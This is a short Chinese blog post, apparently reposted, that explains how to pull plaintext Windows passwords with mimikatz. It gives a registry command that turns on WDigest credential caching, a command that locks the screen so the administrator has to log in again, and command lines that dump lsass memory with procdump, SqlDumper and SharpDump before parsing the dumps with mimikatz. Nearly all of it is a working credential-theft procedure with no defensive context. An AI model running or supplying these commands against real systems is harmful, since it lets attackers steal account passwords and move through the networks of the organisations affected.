mimikaz获取明文密码

Posted websecyw

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了mimikaz获取明文密码相关的知识,希望对你有一定的参考价值。

一.windows2008以上不保存明文密码解决办法

在默认情况下,当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,密码字段显示为null,此时可以通过以下方式开启,但需要用户重新登录后才能成功抓取。

cmd:  reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

在开启 Wdigest Auth 后,需要管理员重新登录才能抓明文密码。

强制锁屏,让管理员重新登录。

rundll32 user32.dll,LockWorkStation

二.procdump+mimikatz

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit"

三.SqlDumper + mimikatz

SqlDumper.exe默认存放在C:\\Program Files\\Microsoft SQL Server\\number\\Shared,number代表SQL Server的版本目标机没有的话可以自己上传

tasklist /svc |findstr lsass.exe

Sqldumper.exe 进程ID 0 0x01100

mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" "exit"

四.SharpDump+ mimikatz

https://github.com/GhostPack/SharpDump

编译生成SharpDump.exe文件大小不超10kb

技术图片

 

 

进入c:\\windows\\temp\\将debug.bin文件提取出来修改后缀bin为zip解压出来

 

技术图片

 

mimikatz.exe "sekurlsa::minidump debug472" "sekurlsa::logonPasswords full" "exit"

 

以上是关于mimikaz获取明文密码的主要内容,如果未能解决你的问题,请参考以下文章

Windows登录密码明文获取器

win7/10获取本地wifi密码明文

如何在 Sabre DAV 的 PDO 类中获取用户的明文密码?

明文密码和散列值抓取防范方法

获取Windows系统明文密码神器

wce获取密码明文或者hashes